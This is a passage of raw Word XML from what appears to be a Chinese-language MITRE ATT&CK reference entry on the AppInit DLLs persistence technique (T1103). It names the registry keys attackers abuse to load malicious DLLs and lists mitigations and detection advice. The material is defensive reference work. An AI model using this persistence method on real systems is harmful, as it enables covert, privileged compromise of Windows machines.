        <w:t>RegSetValueEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A52B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具可能会忽视</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AppCert </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库为自动启动位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3262B" w14:textId="7C717391" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找可能由加载恶意动态链接库的进程导致的异常行为。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而建立网络连接，通过发现了解环境的详细信息，以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C1F9C" w14:textId="4FF0089B" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>AppInit</w:t>
      </w:r>
      <w:r w:rsidR="00C16140">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="786E5246" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C754AEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1103</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC8938F" w14:textId="6348FB94" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD19B89" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53488E4A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在运行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 8</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>及更高版本的系统上禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>secure boot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21879D94" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB4F16F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A9F11C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>已加载</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>动态链接库，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0379F310" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B5740BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5B6F80" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在注册表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>AppInit_DLLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>值中指定的动态链接库被加载到每个加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>user32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的进程。实际上这几乎是加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>每个程序，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>user32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是一个非常常见的库。与进程注入类似，攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>滥用此值</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在计算机</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>单独</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>进程的上下文中加载和运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>动态库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>获得持久性和权限提升。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D136FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及更高版本中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>如果启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>secure boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AppInit </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037C901" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="3DA7DBC3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4726E236" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="39C109F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0F19E8D7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA6A6EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="735E98D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会安装新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppInit_DLLs</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件来执行此技术。使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Defender </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来识别并阻止通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppInit_DLLs</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="31DC2095" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70064244" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件升级</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B291374" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>升级到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 8</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或更高版本并启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>secure</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> boot</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64DACCFE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F71673" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24FC03" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控加载了</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>user32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的进程加载的动态链接库来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>查看是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未识别的或非正常加载到进程的动态链接库。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppInit_DLLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表值来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知软件、补丁周期等无关的修改。监控和分析表示标记了注册表的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RegCreateKeyEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RegSetValueEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的系统更改，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括列出当前的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppIni</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4EECE" w14:textId="5ED60F5A" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找可能由加载恶意动态链接库的进程导致的异常行为。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如为</w:t>
      </w:r>
